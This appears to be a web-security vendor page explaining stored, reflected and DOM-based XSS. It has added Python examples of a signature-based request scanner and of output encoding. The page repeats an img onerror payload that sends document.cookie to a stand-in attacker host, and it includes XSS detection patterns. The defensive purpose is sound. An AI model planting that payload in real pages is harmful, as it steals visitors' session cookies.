XSS attacks fall into three categories: Persistent/Stored XSS, Reflected XSS and DOM based XSS.
- Persistent/Stored XSS attacks store a malicious script on the web application server. Any user accessing the application becomes vulnerable to having the script execute in their browser.
- DOM-based XSS attacks do not inject new script into a web page; they change the behavior of an existing script. Typically the change is accomplished by changing a script-trusted DOM element.
Client-side scripts have complete access to the DOM and can read or modify any part of it, which enables session data theft, cookie manipulation or theft, access to previous browsing history, and so on. For example, an attacker who succeeds in exploiting an XSS vulnerability can hijack the session data of an authenticated user. This allows the attacker to change the user's password, thus gaining access to the victim's account/system.
Even more crucially, XSS attacks can allow an attacker to control the entire client system. Malicious scripts can silently redirect client browsers to attacker-controlled domains serving malware such as browser exploit kits (like Black Hole). These kits profile the user's browser, including its type, version, plugins, and so on. They then deliver a large number of exploits that target known and unknown vulnerabilities, including those in Adobe, Java, and Microsoft plugins. Exploit kits are often the first to incorporate the latest threats that lack vendor patches, and are generally available for a few hundred dollars.
XSS injection is possible through any part of a request that is not properly sanitized before being incorporated into a subsequent response. Typical targets include:
- URL Parameters
- FORM Parameters (GET and POST parameters)
- HTTP Headers
- HTTP Referrer Objects
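The list above names the request parts an inspection rule set has to cover. The following is an added example, not Barracuda code, showing one way to walk those same injection points (URL parameters, form parameters, headers and the Referer header) and match a small signature set against each value after undoing transport encodings such as `+` and `%xx`, so that simply encoding the payload does not hide it. The sample request and the three patterns are constructed for this example; a production rule set is far larger.

```python
import re

# Constructed signature set for illustration only (a real WAF rule set is much larger).
XSS_PATTERNS = [
    re.compile(r"<\s*script", re.IGNORECASE),
    re.compile(r"<\s*\w+[^>]*\bon\w+\s*=", re.IGNORECASE),  # tag carrying an on* event handler
    re.compile(r"javascript\s*:", re.IGNORECASE),
]


def normalize(value):
    """Decode '+' and %xx repeatedly until stable, so double-encoded payloads are matched.
    The decoded text is used for matching only; it is never forwarded to the application."""
    from urllib.parse import unquote_plus
    previous = None
    while previous != value:
        previous = value
        value = unquote_plus(value)
    return value


def raw_pairs(query):
    """Split a query string or form body into (name, raw_value) without decoding anything."""
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield name, value


def injection_points(request):
    """Yield (location, name, raw_value) for each request part listed on the page."""
    path, _, query = request["url"].partition("?")
    for name, value in raw_pairs(query):
        yield ("url_param", name, value)
    for name, value in raw_pairs(request.get("body", "")):
        yield ("form_param", name, value)
    for name, value in request.get("headers", {}).items():
        location = "referer" if name.lower() == "referer" else "header"
        yield (location, name, value)


def find_xss(request):
    """Return (location, name) for every request part whose decoded value matches a pattern."""
    hits = []
    for location, name, raw in injection_points(request):
        value = normalize(raw)
        if any(p.search(value) for p in XSS_PATTERNS):
            hits.append((location, name))
    return hits


# Constructed request: the page's cookie-stealing payload submitted in the address field,
# URL-encoded the way a browser would send it.
SAMPLE_REQUEST = {
    "url": ("/profile/update?address=%3Cimg+src%3DImageNotFound.gif+onerror%3Dwindow.open("
            "'http://attacker_site.com/CaptureCookie.cgi%3Fcookie%3D'%2Bdocument.cookie)%3E"
            "&gender=Male"),
    "body": "first=John&last=Peter",
    "headers": {"Referer": "http://example.test/profile", "User-Agent": "Mozilla/5.0"},
}

if __name__ == "__main__":
    print(find_xss(SAMPLE_REQUEST))
```

The repeated decoding in `normalize` is what catches the double-encoded variant (`%253Cscript%253E`), which a single-pass decoder would see as harmless text; the trade-off is that a legitimate literal `+` is also turned into a space during matching, which is acceptable for detection but is why the decoded value must never replace the original.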
The attacker has injected the code (<img+src=ImageNotFound.gif+onerror=window.open('http://attacker_site.com/CaptureCookie.cgi?cookie='+document.cookie)>) in the address field to fetch the session cookie of any victim (user) who tries to view the attacker's profile.
<title>All Form Fields</title>
<TR> <TD>First Name:</TD> <TD>John</TD></TR>
<TR> <TD>Last Name:</TD> <TD>Peter</TD></TR>
<TR> <TD>Address:</TD> <TD><img src=ImageNotFound.gif onerror=window.open('http://attacker_site.com/CaptureCookie.cgi?cookie='+document.cookie)></TD></TR>
<TR> <TD>Gender:</TD> <TD>Male</TD></TR>
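The profile page above is rendered with the stored address value placed straight into the HTML, which is why the `img` tag's `onerror` handler runs in every viewer's browser. The following is an added example, not code from the page or from Barracuda, showing that vulnerable rendering beside the usual code-level fix: HTML-entity encoding every stored value at output time. The profile dictionary and the `contains_active_markup` check are constructed for this example.

```python
import html
import re

# Constructed profile: the same four fields shown on the page, with the injected address.
PROFILE = {
    "First Name": "John",
    "Last Name": "Peter",
    "Address": "<img src=ImageNotFound.gif onerror=window.open("
               "'http://attacker_site.com/CaptureCookie.cgi?cookie='+document.cookie)>",
    "Gender": "Male",
}


def render_unsafe(fields):
    """Vulnerable rendering: stored values are concatenated into the HTML unchanged."""
    rows = "".join(f"<TR> <TD>{k}:</TD> <TD>{v}</TD></TR>" for k, v in fields.items())
    return f"<title>All Form Fields</title>{rows}"


def render_safe(fields):
    """Hardened rendering: every stored value is entity-encoded for an HTML text context.
    quote=True also encodes ' and ", so the value stays inert inside attributes as well."""
    rows = "".join(
        f"<TR> <TD>{html.escape(k)}:</TD> <TD>{html.escape(v, quote=True)}</TD></TR>"
        for k, v in fields.items()
    )
    return f"<title>All Form Fields</title>{rows}"


# Matches a tag that carries an on* event handler, e.g. <img ... onerror=...>.
ACTIVE_MARKUP = re.compile(r"<\s*\w+[^>]*\bon\w+\s*=", re.IGNORECASE)


def contains_active_markup(rendered):
    """Constructed check: does the rendered output still contain a tag with an event handler?"""
    return ACTIVE_MARKUP.search(rendered) is not None


if __name__ == "__main__":
    print(render_unsafe(PROFILE))
    print(render_safe(PROFILE))
```

With `render_safe`, the address is emitted as `&lt;img src=ImageNotFound.gif onerror=...&gt;`, which the browser displays as literal text instead of parsing as a tag; the session cookie is never sent anywhere. Encoding at output rather than stripping at input also keeps the stored data intact for contexts (logs, APIs) that are not HTML.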
The Barracuda Web Application Firewall immediately remediates XSS attacks. It contains comprehensive rule sets to detect plain or obfuscated XSS attacks in incoming requests. Out-of-the-box, the default security policy defeats all XSS attacks without requiring any additional configuration or changes to web application code. Signatures are automatically updated to cover the latest threats.